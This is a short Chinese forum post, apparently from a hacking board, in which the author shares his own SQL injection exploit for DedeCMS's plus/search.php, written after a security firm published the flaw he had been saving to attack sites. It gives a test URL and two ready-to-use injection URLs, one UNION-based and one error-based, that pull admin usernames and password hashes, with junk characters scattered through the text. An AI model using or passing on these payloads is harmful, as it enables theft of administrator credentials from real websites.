转载不加作者名的没JJ R0 [! F9 c. g7 [ l4 A8 \
' q, g2 l. O0 w8 [3 o1 ^5 t, ]哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。# c/ w l' N! w5 H
- \6 }, i2 a' Y# q8 e: o既然已经发出来了,我就把我自己搞的exp发下吧。。唉。9 t4 h+ q# A, z2 e; {/ z
" j7 A4 q& v1 I8 o% i我一般是这样测试的:
5 v0 G5 P# X* ^; X+ ^4 i, C- W: n d% \# h& Z: j* V
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
0 k' `" r" T; w6 C" b* D& D1 V& I5 Q2 ^
转载不加作者名的没JJ, J$ S( G* [; I3 I& F$ c! l# F8 m
5 x5 r. n+ S \% q& W) c3 S9 S
作者:鬼哥
3 S/ m5 m. |- s" m F4 p' B& g2 u( o2 ?8 E. |$ C+ z' K: f' d* {
+ s' h. W* B- K# |9 v) _' i. n% ?' y% N
看结果如果提示
; R0 K) M( F% \5 X' W" D& D6 ]$ w# l. }* X
Safe Alert: Request Error step 2 !
2 M4 G0 S- b, ]3 e2 i! i( W3 T. [+ n" ~' v' b
那么直接用下面的exp
/ C8 f$ i" q! _3 {# Y& F5 T* d0 d" M8 L1 t! x" Z3 A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
- ^' y! A" J, g9 s
. Q* j6 B, j9 D8 s, v( d; l9 L3 h. C! w5 g% m
看结果如果提示
7 r8 y' L" G8 l. C: `3 d' ^3 ^5 ~& w+ U6 N
Safe Alert: Request Error step 1 !& s; `. J K+ N3 g3 L9 U4 Q
" z1 \. M" w* E
那么直接用下面的exp
$ c, ~7 ^5 Q8 a$ g
- x2 `& }# U; _/ Lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
+ G6 \; s' O) |% b: T8 V' {
. I- Z; A. W; u9 t& w0 b! q) X# @! X3 H$ r! O# ?/ e
如果正常显示证明漏洞不存在了。2 \: M1 c# f; A( Z8 p0 K
3 y& M% F% P. B F2 |# \! r* h转载不加作者名的没JJ |